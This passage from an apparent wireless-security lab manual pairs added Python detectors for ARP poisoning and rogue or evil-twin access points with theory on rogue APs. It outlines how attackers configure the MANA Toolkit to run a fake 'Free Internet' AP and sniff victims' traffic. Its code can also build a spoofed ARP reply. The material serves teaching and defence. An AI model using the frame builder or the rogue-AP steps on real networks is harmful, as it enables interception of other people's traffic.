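    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None

    def fmt_mac(b):
        return ":".join(f"{x:02x}" for x in b)

    def fmt_ip(b):
        return ".".join(str(x) for x in b)

    return {"opcode": struct.unpack("!H", frame[20:22])[0],
            "sender_mac": fmt_mac(frame[22:28]), "sender_ip": fmt_ip(frame[28:32]),
            "target_mac": fmt_mac(frame[32:38]), "target_ip": fmt_ip(frame[38:42])}


class ArpWatch:
    """Keeps the IP-to-MAC bindings seen in ARP replies and flags any change: the
    symptom of poisoning is one IP suddenly answering from a second MAC."""

    def __init__(self):
        self.bindings = {}

    def observe(self, frame: bytes):
        arp = parse_arp(frame)
        if arp is None or arp["opcode"] != ARP_REPLY:
            return None
        old = self.bindings.get(arp["sender_ip"])
        self.bindings[arp["sender_ip"]] = arp["sender_mac"]
        if old is not None and old != arp["sender_mac"]:
            return f"ALERT {arp['sender_ip']} moved from {old} to {arp['sender_mac']}"
        return None


def demo():
    """Constructed traffic: the real gateway answers first, then the attacker poisons the victim."""
    gateway_ip, gateway_mac = "10.0.0.1", "aa:aa:aa:aa:aa:01"
    victim_ip, victim_mac = "10.0.0.25", "cc:cc:cc:cc:cc:25"
    attacker_mac = "bb:bb:bb:bb:bb:99"
    frames = [
        build_arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),    # legitimate reply
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),   # poison: gateway IP, attacker MAC
    ]
    watch = ArpWatch()
    return [watch.observe(f) for f in frames]


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The detector has the same blind spot as a real arpwatch: it learns the first binding it sees, so it must be running before the attack starts or be seeded from a trusted inventory.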
PRACTICAL-9
THEORY:-
Rogue APs are wireless APs that an attacker installs on a network without authorization and are not
under the management of the network administrator. These rogue APs are not configured for
security, unlike the authorized APs on the target wireless network. Thus, this rogue AP can provide
backdoor access to the target wireless network. Interesting scenarios for rogue AP installation and
setup include the following.
● Compact, pocket-sized rogue AP plugged into an Ethernet port of the target network: An
attacker can use compact, pocket-sized rogue APs because they are easily available, can be
stealthily brought onsite, and consume very little power.
● Rogue AP connected to corporate networks over a Wi-Fi link: An attacker connects a rogue
AP to a Wi-Fi link of the target network. Because the rogue AP connects wirelessly to the
authorized network, it is easily hidden. However, it requires the credentials of the target
network to connect.
● USB-based rogue AP plugged into a network machine: An attacker can easily plug a USB-
based rogue AP into any Windows machine on the target network that is connected through
wired or wireless means. The USB AP’s software shares the network access of the machine
with the rogue AP. This eliminates the need for both an unused Ethernet port and the
credentials of the target Wi-Fi, which are required in the above two scenarios to set up a
rogue AP.
MANA Toolkit comprises a set of tools used by attackers to create rogue APs and perform sniffing and
MITM attacks; it also includes components for bypassing HTTPS and HTTP Strict Transport Security
(HSTS). Attackers use MANA Toolkit to create a rogue AP through the following steps.
● Modify MANA's configuration file hostapd-mana.conf with any text editor to set up the fake access
point: set the wireless interface (wlan0 is used here) as well as the MAC address (BSSID) or SSID
(the SSID Free Internet is used here).
● Once a victim connects to the Internet through the rogue AP, all data packets from the device flow
through the rogue AP, and tools such as tcpdump and Wireshark can be used to capture and analyze the
packets.
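From the defender's side, the scenarios above leave two signatures in the air: a BSSID broadcasting the corporate SSID that is not one of the authorized APs, and a single BSSID answering probe requests for many unrelated SSIDs, which is how a MANA-style rogue AP impersonates whatever networks nearby clients are looking for. The Python below is an added example (not code from the lab manual or from MANA) implementing both checks over a constructed capture of beacons and probe responses; the authorized list and observations are constructed.

```python
"""Detecting rogue and evil-twin APs from beacon and probe-response observations (added example)."""
from collections import defaultdict

# Authorized BSSIDs per corporate SSID (constructed inventory).
AUTHORIZED = {"CorpNet": {"00:11:22:33:44:55", "00:11:22:33:44:56"}}

# (frame type, bssid, ssid, privacy bit set) as a wireless IDS sensor would log them.
OBSERVATIONS = [
    ("beacon", "00:11:22:33:44:55", "CorpNet", True),
    ("beacon", "00:11:22:33:44:56", "CorpNet", True),
    ("beacon", "de:ad:be:ef:00:01", "CorpNet", False),          # open evil twin of the corporate SSID
    ("beacon", "de:ad:be:ef:00:02", "Free Internet", False),
    ("probe_resp", "de:ad:be:ef:00:02", "Starbucks", False),    # one BSSID answering for many SSIDs
    ("probe_resp", "de:ad:be:ef:00:02", "HomeWifi", False),
    ("probe_resp", "de:ad:be:ef:00:02", "CorpNet", False),
    ("probe_resp", "de:ad:be:ef:00:02", "attwifi", False),
    ("probe_resp", "00:11:22:33:44:55", "CorpNet", True),
]


def find_rogue_aps(observations, authorized=AUTHORIZED, karma_threshold=3):
    """Return alert strings for evil twins and for KARMA/MANA-style responders.

    karma_threshold: number of distinct SSIDs one BSSID may advertise before it is
    flagged; legitimate APs announce one or a handful, a MANA AP answers for any.
    """
    alerts = []
    ssids_per_bssid = defaultdict(set)
    reported = set()
    for kind, bssid, ssid, privacy in observations:
        ssids_per_bssid[bssid].add(ssid)
        if ssid in authorized and bssid not in authorized[ssid] and (bssid, ssid) not in reported:
            reported.add((bssid, ssid))
            how = "encrypted" if privacy else "open"
            alerts.append(f"EVIL TWIN: {bssid} advertises {ssid!r} ({how}, seen in {kind}) "
                          f"but is not an authorized AP")
    for bssid, ssids in sorted(ssids_per_bssid.items()):
        if len(ssids) >= karma_threshold:
            alerts.append(f"KARMA/MANA: {bssid} answers for {len(ssids)} different SSIDs: {sorted(ssids)}")
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_aps(OBSERVATIONS):
        print(alert)
```

The first check needs an up-to-date inventory of authorized BSSIDs; the second needs none, which makes it the more portable detection for the MANA case.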
Source: https://www.studocu.com/in/document/gujarat-technological-university/mobile-computing-and-wireless-communication/mobile-computing-and-wireless-communication2170710-lab-manual/18844495